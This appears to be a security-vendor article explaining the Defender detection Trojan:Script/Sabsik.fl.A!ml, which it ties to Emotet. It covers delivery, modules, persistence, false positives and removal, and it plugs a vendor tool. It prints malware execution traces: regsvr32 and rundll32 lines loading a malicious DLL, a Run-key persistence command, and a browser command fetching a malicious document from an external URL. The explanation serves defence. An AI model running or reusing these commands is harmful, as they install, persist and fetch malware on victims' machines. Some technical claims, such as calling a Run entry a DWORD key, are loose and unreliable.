Trojan:Script/Sabsik.fl.A!ml is a generic detection name used by Microsoft Defender. This name is particularly used to denote stealer malware that also possesses dropper capabilities. It can perform various activities of the attacker’s choice on the victim’s computer, such as spying, data theft, remote control, and installation of other viruses. In this article, we will tell you how to analyze, detect, and remove this trojan from your computer.
What is Trojan:Script/Sabsik.fl.A!ml?
Trojan:Script/Sabsik.fl.A!ml is a trojan detected by Windows Defender. This detection particularly refers to stealer malware that is also capable of other activities, for instance – deploying other malware.
Typically, Sabsik Trojans are distributed through email spam. The email attachments contain a hidden script that triggers the malware to download and run when macros are activated. As a result, users who accidentally open these files download and run the virus without realizing it. Some Sabsik samples can self-distribute through vulnerabilities in the Windows network, such as EternalBlue.
Trojan Sabsik Threat Analysis
Probably, the best-known malware sample that was detected as Trojan:Script/Sabsik.fl.A!ml is Emotet Trojan. Even though it now borders its extinction, the fact of this signature relation to this malware gives us an excellent clue on what you can expect when Sabsik is running in the system.
Launch and Detection Evasion
Emotet a.k.a Sabsik uses a variety of techniques to avoid detection by antivirus software and ensure it runs successfully on target systems. The malware typically employs deep packing, obfuscation, and other detection evasion techniques, making it difficult for traditional antivirus solutions to detect its presence. When arranging its launch, this malware typically performs a trick known as DLL sideloading.
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\007852768570c1d9528259e7e52aecf5e4ae97dadd75a459cc53f9acca65054d.dll – to register the malware DLL.
C:\Windows\SysWOW64\rundll32.exe "C:\Users\Admin\AppData\Local\Temp\007852768570c1d9528259e7e52aecf5e4ae97dadd75a459cc53f9acca65054d.dll",DllRegisterServer – to launch the latter.
Modules
Emotet is modular malware, meaning it can extend its functionality by loading additional modules. Not all Sabsik samples possess modularity, but it has become a more and more widespread feature in modern malware. Some of the common modules associated with this threat include:
- Stealer Module – used for stealing banking credentials and other sensitive information.
- Hardware Module – collects detailed information about the infected system.
- XMRig Module – utilized for cryptocurrency mining purposes.
- Advanced Email Stealer Module – steals email credentials and contact lists.
- SMB Lateral Movement Module – enables lateral movement within a network by exploiting SMB vulnerabilities.
- Traffic Proxying (UPnP) Module – facilitates the redirection of traffic to C2 servers through compromised servers.
Establishing Persistence & Data Stealing
After infecting the system, Sabsik creates a registry key in the infected system’s registry, ensuring that it is launched every time the system boots up. This persistence mechanism allows Sabsik to maintain a foothold on the infected system, even after reboots. Malware creates a DWORD key with the following contents in the HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry hive:
C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Tzusqvzhnftw\gwwfpucmcdt.ruj
Data Collection & Other Functionality
Despite focusing on banking info, Emotet/Sabsik is capable of collecting various types of sensitive information from infected systems. This may include usernames, passwords, system information, and email credentials. Sabsik also possesses functionality for self-propagation through email spamming and lateral movement within networks, allowing it to rapidly spread and infect multiple systems.
Malware Delivery by Emotet
Despite originally being a banking stealer, Emotet is mostly known as dropper malware. In the prime days, vast networks controlled by Emotet were used to deploy various payloads to infected systems. Among them were ransomware, spyware, coin miners, and other types of malware. Emotet indiscriminately targets both individual users and organizations, spreading its malicious payloads according to the directives of its operators.
C:\Program Files\Google\Chrome\Application\chrome.exe" --disk-cache-dir=null --disk-cache-size=1 --media-cache-size=1 --disable-gpu-shader-disk-cache --disable-background-networking --disable-features=OptimizationGuideModelDownloading,OptimizationHintsFetching,OptimizationTargetPrediction,OptimizationHints "https://brooklyn.blob.core.windows.net/pen-test/MaliciousDOC.doc
Trojan:Script/Sabsik.fl.A!ml – False Positive or Not?
In some cases, Sabsik Trojan may be mistakenly detected by antivirus software if you try to run a legitimate file such as a game, application, or driver. This can happen due to an incorrect signature, incompatibility, corruption, or file change. According to several user reports, popular games downloaded from legitimate sources may sometimes be mistakenly flagged as Trojan:Script/Sabsik.fl.A!ml.
One particular example comes from a BattleNET user who purchased Diablo II Resurrected and was warned about the Sabsik Trojan when trying to launch the game. It’s not hard to guess that a game released by a company as big as Blizzard would not contain malware. If you are 100% sure that the source of your download is safe, the Sabsik Trojan notification could easily be a false positive.
It is also important to note the presence of the “!ml” particle added to the detection name. This stands for the use of an AI detection system. While this method is highly effective, it can generate false positive detections without confirmation from other detection systems.
However, it is impossible to be 100% sure that the source of the downloads is safe. If after interacting with a shadow file of unknown origin you see a warning about the Sabsik Trojan program, you should quarantine/remove the source of the threat.
How to remove Trojan:Script/Sabsik.fl.A!ml?
If Sabsik Trojan was detected in an untrusted file, you should delete it. However, this is not enough to be sure of your security. We recommend performing a full system scan with a reliable anti-malware tool such as GridinSoft Anti-Malware. Last but not least, you may want to consider changing important passwords in case they are compromised, although this is unlikely to happen.
